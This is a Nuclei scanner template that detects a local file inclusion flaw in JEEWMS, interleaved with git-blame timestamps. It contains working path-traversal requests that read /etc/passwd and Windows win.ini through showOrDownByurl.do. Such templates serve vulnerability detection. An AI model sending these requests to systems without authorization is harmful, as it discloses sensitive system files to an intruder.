2021-06-01 09:08:45 +00:00
|
|
|
id: jeewms-lfi
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: JEEWMS - Local File Inclusion
|
2021-06-01 09:08:45 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: JEEWMS is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: jeewms,lfi
|
2021-06-01 09:08:45 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-06-01 09:08:45 +00:00
|
|
|
- raw:
|
|
|
|
- | #linux
|
2021-12-22 12:33:51 +00:00
|
|
|
GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
|
2021-06-01 09:08:45 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
- | #windows
|
|
|
|
GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-06-22 12:58:52 +00:00
|
|
|
- "\\[(font|extension|file)s\\]"
|
|
|
|
condition: or
|
|
|
|
part: body
|
2021-06-01 09:08:45 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a00463044022052b4ce068f718f09b7e107e584d3dd574b7cd745853d5d2090e700281ef832670220423c32b664864533da6a198cf5bd07939fa1d3f573e946b4bf4dac90e57dc91f:922c64590222798bb761d5b6d8e72950
|